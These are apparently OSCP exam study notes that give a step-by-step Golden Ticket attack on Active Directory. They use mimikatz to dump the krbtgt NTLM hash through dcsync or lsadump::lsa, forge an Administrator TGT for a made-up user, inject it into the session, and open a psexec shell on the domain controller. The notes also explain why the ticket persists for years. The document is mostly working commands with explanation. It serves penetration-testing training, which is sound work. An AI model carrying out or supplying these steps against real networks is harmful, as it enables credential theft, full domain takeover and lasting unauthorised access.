OSCP Notes

Golden Ticket

Check first whether you already have admin access to the DC:
psexec.exe \\dc_name cmd.exe
If this is denied, you are not an admin on the DC and the golden ticket is how you get there. Once the forged ticket is injected, this same command is what you come back to.
What you need:
  1. Domain name
  2. Domain SID: take your own SID from whoami /user and drop the last component (your RID). S-1-5-21-...-1103 becomes S-1-5-21-..., which is the domain SID.
  3. KRBTGT NTLM hash (requires elevated privileges: Domain Admin / replication rights for dcsync, or SYSTEM on the DC itself) -> with this key we can forge our own TGT
  • The TGT we forge can claim that an ordinary user is a member of Domain Admins. The DC trusts it because it is encrypted with the krbtgt key, and that is the only check the KDC makes.
  • The krbtgt password does not change automatically, so the hash stays valid, and so does any ticket forged from it, until an admin rotates it. Even then the previous key is still accepted until it is rotated a second time.
run mimikatz (privilege::debug first)
lsadump::dcsync /domain:domainname.local /user:krbtgt
or, if you are already SYSTEM on the DC itself,
lsadump::lsa /patch
copy the Hash NTLM value of the krbtgt account.
Use the golden ticket to get domain admin access with the information you got!
in mimikatz,
kerberos::golden /domain:domain.local /sid:SID_Value /rc4:NTLM_HASH /id:500 /user:gori
  • /sid -> the domain SID, without the trailing RID
  • /rc4 -> the krbtgt NTLM hash (/krbtgt: is the same option)
  • /id -> the RID the ticket claims to belong to; 500 is the built-in Administrator
  • /user -> name it whatever! No account is created in AD and the name doesn't have to exist; it is just written into the ticket
  • without /ptt the ticket is written to ticket.kirbi in the current directory
After you forge the ticket, pass it into your current logon session
kerberos::ptt ticket.kirbi
(or add /ptt to the kerberos::golden line to inject it directly)
Launch a command prompt from that session (misc::cmd in mimikatz, or a new cmd.exe under the same logon)
and you will have domain admin privileges! You can access the domain controller's file shares (and the ticket doesn't expire for a long time: mimikatz gives it a 10-year lifetime by default)
pushd \\domain_Controller\c$
psexec.exe \\dc01 cmd.exe
to launch a command prompt on the DC as the user in the ticket. Use the hostname, not the IP: with an IP, Windows falls back to NTLM, and there is no real password behind the forged user, so only Kerberos will work.
check your group memberships in the shell on the DC (on your own box whoami still shows the old token; the ticket only changes network authentication)
whoami /groups
klist shows the injected ticket; the krbtgt/DOMAIN entry with an end time years in the future is the golden ticket.